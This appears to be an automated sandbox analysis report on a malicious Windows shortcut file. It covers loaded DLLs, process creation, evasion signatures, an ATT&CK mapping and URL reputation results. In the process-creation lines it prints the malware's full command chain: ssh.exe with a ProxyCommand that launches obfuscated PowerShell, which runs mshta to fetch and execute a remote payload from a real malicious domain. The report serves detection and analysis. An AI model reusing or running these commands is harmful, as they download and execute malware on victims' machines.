Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: mshtml.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: wkscli.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: umpdc.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: msiso.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: srpapi.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: ieframe.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: netapi32.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: version.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: msimtf.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: dxgi.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: textinputframework.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: coremessaging.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: ntmarta.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: coremessaging.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: dataexchange.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: d3d11.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: dcomp.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: schannel.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: ntasn1.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: ncrypt.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: jscript9.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: d2d1.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: dwrite.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: d3d10warp.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: dxcore.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: mlang.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: windowscodecs.dll
Source: C:\Windows\System32\mshta.exe | Section loaded: uianimation.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\mshta.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32
Source: IOnqEVA4Dz.lnk | LNK file: ..\..\..\..\..\..\..\Windows\System32\OpenSSH\ssh.exe
Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Persistence and Installation Behavior

Source: LNK file | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file | Process created: C:\Windows\System32\mshta.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1334Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1927Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1858Jump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exe TID: 4676Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2680Thread sleep count: 1334 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3200Thread sleep count: 1927 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2504Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1172Thread sleep count: 1858 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1172Thread sleep count: 64 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5640Thread sleep time: -1844674407370954s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 2684Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: mshta.exe, 00000005.00000002.3564144751.000001B5C0FD7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000005.00000002.3564144751.000001B5C0F3D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3564687126.0000021AF9C2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.3566878515.0000021AFF25B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: mshta.exe, 00000005.00000002.3564144751.000001B5C0F77000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWindowClassr6
Source: ssh.exe, 00000000.00000002.3563617247.00000229B4079000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\mshta.exeMemory allocated: page read and write | page guardJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell powershell -Command 'UqtSm[`6fHA6[bo=yymshta https://awakka-aws3.zoho-documents.com/hekko.mp4UqtSm[`6fHA6[bo=yy'.SubString(18, 54)Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta https://awakka-aws3.zoho-documents.com/hekko.mp4"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" https://awakka-aws3.zoho-documents.com/hekko.mp4Jump to behavior
Source: unknownProcess created: C:\Windows\System32\OpenSSH\ssh.exe "c:\windows\system32\openssh\ssh.exe" -o proxycommand="powershell powershell -command 'uqtsm[`6fha6[bo=yymshta https://awakka-aws3.zoho-documents.com/hekko.mp4uqtsm[`6fha6[bo=yy'.substring(18, 54)" .
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\OpenSSH\ssh.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
ATT&CK Matrix (one line per tactic; a leading number is the report's count of matched signatures for that technique)
Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: 1 Command and Scripting Interpreter; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task
Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: 11 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Defense Evasion: 11 Masquerading; 1 Disable or Modify Tools; 31 Virtualization/Sandbox Evasion; 11 Process Injection; 1 DLL Side-Loading; Steganography
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: 11 Security Software Discovery; 11 Process Discovery; 31 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 File and Directory Discovery; 23 System Information Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: 1 Email Collection; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Command and Control: 1 Encrypted Channel; 3 Ingress Tool Transfer; 3 Non-Application Layer Protocol; 14 Application Layer Protocol; Fallback Channels; Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop
Behavior Graph (ID: 1582822, Sample: IOnqEVA4Dz.lnk, Startdate: 31/12/2024, Architecture: WINDOWS, Score: 76)
Signatures on the sample node: Antivirus detection for URL or domain; Windows shortcut file (LNK) starts blacklisted processes; Multi AV Scanner detection for submitted file; 3 other signatures
DNS on the sample node: awakka-aws3.zoho-documents.com
Process tree:
  ssh.exe (started) [Windows shortcut file (LNK) starts blacklisted processes]
    powershell.exe (started) [Windows shortcut file (LNK) starts blacklisted processes]
      powershell.exe (started) [Windows shortcut file (LNK) starts blacklisted processes]
        mshta.exe (started) -> awakka-aws3.zoho-documents.com 172.67.129.82, port 443, local ports 49723, 49726 (CLOUDFLARENETUS, United States)
    conhost.exe (started)
  svchost.exe (started) -> 127.0.0.1 (unknown)

Source | Detection | Scanner | Label
IOnqEVA4Dz.lnk | 36% | Virustotal | -
IOnqEVA4Dz.lnk | 34% | ReversingLabs | Shortcut.Trojan.Pantera
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
https://awakka-aws3.zoho-documents.com/cdn-cgi/styles/cf.errors.cssD | 0% | Avira URL Cloud | safe
https://awakka-aws3.zoho-documents.com/cdn-cgi/styles/cf.errors.css | 0% | Avira URL Cloud | safe
https://awakka-aws3.zoho-documents.com/cdn-cgi/styles/cf.errors.css_ | 0% | Avira URL Cloud | safe
https://awakka-aws3.zoho-documents.com/cdn-cgi/images/icon-exclamation.png?1376755637...0 | 0% | Avira URL Cloud | safe
https://awakka-aws3.zoho-documents.com/cdn-cgi/images/icon-exclamation.png?1376755637a | 0% | Avira URL Cloud | safe
https://awakka-aws3.zoho-documents.com/cdn-cgi/images/icon-exclamation.png?1376755637= | 0% | Avira URL Cloud | safe
https://awakka-aws3.zoho-documents.com/hekko.mp4p | 0% | Avira URL Cloud | safe
https://awakka-aws3.zoho-documents.com/cdn-cgi/images/icon-exclamation.png?1376755637 | 0% | Avira URL Cloud | safe
https://awakka-aws3.zoho-documents.com/cdn-cgi/styles/cf.errors.css: | 0% | Avira URL Cloud | safe
https://awakka-aws3.zoho-documents.com/hekko.mp4Pgs | 0% | Avira URL Cloud | safe
https://awakka-aws3.zoho-documents.com/hekko.mp4C: | 0% | Avira URL Cloud | safe
https://awakka-aws3.zoho-documents.com/cdn-cgi/images/icon-exclamation.png?1376755637) | 0% | Avira URL Cloud | safe
https://awakka-aws3.zoho-documents.com/hekko.mp4yles/cf.errors.css | 0% | Avira URL Cloud | safe
https://awakka-aws3.zoho-documents.com/hekko.mp4_ | 0% | Avira URL Cloud | safe
https://awakka-aws3.zoho-documents.com/cdn-cgi/images/icon-exclamation.png?1376755637...ust | 0% | Avira URL Cloud | safe
https://awakka-aws3.zoho-documents.com/hekko.mp4i | 0% | Avira URL Cloud | safe
https://awakka-aws3.zoho-documents.com/cdn-cgi/phish-bypass | 0% | Avira URL Cloud | safe
https://awakka-aws3.zoho-documents.com/ | 0% | Avira URL Cloud | safe
https://awakka-aws3.zoho-documents.com/hekko.mp4m32 | 0% | Avira URL Cloud | safe
https://awakka-aws3.zoho-documents.com/cdn-cgi/images/icon-exclamation.png?1376755637...p | 0% | Avira URL Cloud | safe
https://awakka-aws3.zoho-documents.com/cdn-cgi/styles/cf.errors.cssnt | 0% | Avira URL Cloud | safe
https://awakka-aws3.zoho-documents.com/hekko.mp4L | 0% | Avira URL Cloud | safe
https://awakka-aws3.zoho-documents.com/hekko.mp4https://awakka-aws3.zoho-documents.com/hekko.mp4p7 | 0% | Avira URL Cloud | safe
https://awakka-aws3.zoho-documents.com/cdn-cgi/images/icon-exclamation.png?1376755637... | 0% | Avira URL Cloud | safe
https://awakka-aws3.zoho-documents.com/hekko.mp4 | 100% | Avira URL Cloud | malware
https://awakka-aws3.zoho-documents.com/hekko.mp4$global:? | 0% | Avira URL Cloud | safe
https://awakka-aws3.zoho-documents.com/cdn-cgi/images/icon-exclamation.png?1376755637q | 0% | Avira URL Cloud | safe
https://awakka-aws3.zoho-documents.com/hekko.mp4H | 0% | Avira URL Cloud | safe
https://awakka-aws3.zoho-documents.com/cdn-cgi/phish-bypassk | 0% | Avira URL Cloud | safe
https://awakka-aws3.zoho-documents.com/hekko.mp4Ygs | 0% | Avira URL Cloud | safe
https://awakka-aws3.zoho-documents.com/cdn-cgi/images/icon-exclamation.png?1376755637m | 0% | Avira URL Cloud | safe
https://awakka-aws3.zoho-documents.com/cdn-cgi/images/icon-exclamation.png?1376755637n | 0% | Avira URL Cloud | safe
https://awakka-aws3.zoho-documents.com/hekko.mp42 | 0% | Avira URL Cloud | safe
https://awakka-aws3.zoho-documents.com/hekko.mp4UqtSm | 0% | Avira URL Cloud | safe
https://awakka-aws3.zoho-documents.com/cdn-cgi/images/icon-exclamation.png?1376755637i | 0% | Avira URL Cloud | safe
https://awakka-aws3.zoho-documents.com/cdn-cgi/images/icon-exclamation.png?13767556376.1 | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
awakka-aws3.zoho-documents.com | 172.67.129.82 | true | false | - | high

Name | Malicious | Antivirus Detection | Reputation
https://awakka-aws3.zoho-documents.com/cdn-cgi/styles/cf.errors.css | false | Avira URL Cloud: safe | unknown
https://awakka-aws3.zoho-documents.com/cdn-cgi/images/icon-exclamation.png?1376755637 | false | Avira URL Cloud: safe | unknown
https://awakka-aws3.zoho-documents.com/hekko.mp4 | true | Avira URL Cloud: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://www.cloudflare.com/5xx-eraryer | mshta.exe, 00000005.00000002.3564144751.000001B5C0FD7000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://www.cloudflare.com/learning/access-management/phishing-attack/ | mshta.exe, 00000005.00000002.3566486432.000001BDC3A00000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://awakka-aws3.zoho-documents.com/cdn-cgi/images/icon-exclamation.png?1376755637a | mshta.exe, 00000005.00000002.3566486432.000001BDC3A99000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://awakka-aws3.zoho-documents.com/cdn-cgi/styles/cf.errors.css_ | mshta.exe, 00000005.00000002.3566486432.000001BDC3A00000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://g.live.com/odclientsettings/ProdV2.C: | svchost.exe, 00000006.00000003.2366242998.0000021AFF090000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.6.dr, edb.log.6.dr | false | - | high
https://www.cloudflare.com/learning/access-management/phishing-attack/v | mshta.exe, 00000005.00000002.3568334539.000001BDC7F62000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://awakka-aws3.zoho-documents.com/cdn-cgi/images/icon-exclamation.png?1376755637...0 | mshta.exe, 00000005.00000002.3566486432.000001BDC3A00000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://awakka-aws3.zoho-documents.com/cdn-cgi/images/icon-exclamation.png?1376755637A | mshta.exe, 00000005.00000002.3566486432.000001BDC3A99000.00000004.00000020.00020000.00000000.sdmp | false | - | unknown
https://awakka-aws3.zoho-documents.com/cdn-cgi/images/icon-exclamation.png?1376755637= | mshta.exe, 00000005.00000002.3566486432.000001BDC3A99000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://awakka-aws3.zoho-documents.com/cdn-cgi/styles/cf.errors.cssD | mshta.exe, 00000005.00000002.3566486432.000001BDC3A00000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://awakka-aws3.zoho-documents.com/hekko.mp4p | powershell.exe, 00000004.00000002.2345137749.0000029200001000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
